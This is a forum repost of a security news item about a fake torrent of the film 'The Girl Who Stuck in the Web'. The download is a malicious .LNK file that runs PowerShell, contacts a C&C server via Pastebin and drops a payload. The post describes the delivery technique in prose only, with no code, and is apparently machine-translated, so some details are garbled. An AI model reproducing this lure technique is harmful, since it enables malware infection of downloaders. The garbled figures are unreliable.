Brother
Professional
- Messages
- 2,590
- Reaction score
- 544
- Points
- 113
An information security specialist known under the pseudonym 0xffff0800 discovered on The Pirate Bay torrent tracker a distribution of the movie "The Girl Who Stuck in the Web", where instead of the movie, the user downloaded a suspicious .LNK file containing a PowerShell command. Interestingly, at the time of the discovery of the fake "film", 2,375 people were handed out.
Immediately after launching such a fake movie, a PowerShell command is executed, which runs a chain of other commands, which ultimately leads to the load of the payload in% AppData%. In essence, PowerShell communicates with the attackers' C&C server, from where it is redirected to Pastebin for further instructions.
After checking the found file on VirusTotal, the specialist noticed that not all security solutions detect suspicious activity in it. The researcher also suggested that the file may be associated with the well-known hack group CozyBear (aka APT29, CozyDuke, CozyCar, Grizzly Bear), which has already used a similar technique for its attacks.
0xffff0800 disagrees with FireEye expert Nick Carr, who notes that malicious .LNK files are used very often, especially to deceive users of "pirated" sites, and this is not the only CozyBear group.
0xffff0800 published .LNK in the public domain so that other specialists could study its find. BleepingComputer founder Lawrence Abrams discovered that executing a .LNK file does more than just embed ads on Google's home page, as originally intended.
